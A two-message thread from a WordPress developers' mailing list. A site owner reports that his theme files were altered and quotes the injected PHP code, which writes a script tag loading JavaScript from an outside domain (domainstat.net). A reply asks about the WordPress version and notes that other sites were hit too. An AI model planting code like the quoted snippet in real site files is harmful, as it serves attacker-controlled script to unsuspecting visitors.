Domainstat intrusion

classic Classic list List threaded Threaded
2 messages Options
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

Domainstat intrusion

Chetan Kunte-2
Hi all -

First of all, I am sorry to bring this up on this forum, but my theme
files are getting modified. The modified files have this following
script inserted (the ID seems to change from file to file but
essentially this is it).

<? if (!defined('domainstat')) { define("domainstat", "ok");  echo
"<script language='JavaScript' type='text/javascript'
src='http://domainstat.net/stat.php?id=f15d1bf'></script>";}?>

Tell me I've been hacked and I'll believe you. More than that I'd like
to know how anyone could modify these files without permission. I'm
not being sloppy with passwords.

Any help / insight into this would really be helpful, thanks in advance.
--
Chetan, ckunte.com

_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Reply | Threaded
Open this post in threaded view
|  
Report Content as Inappropriate

RE: Domainstat intrusion

Brian Layman
Which version of WP are you using? Older versions had security issues the
newer ones have patched.

BTW, you're not alone in this by any means, even in the WP world.  Here are
just a few references:

http://www.google.com/search?num=100&hl=en&lr=&q=%22domainstat.net%22

There are a couple WP support forum references in there.


_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers
Loading...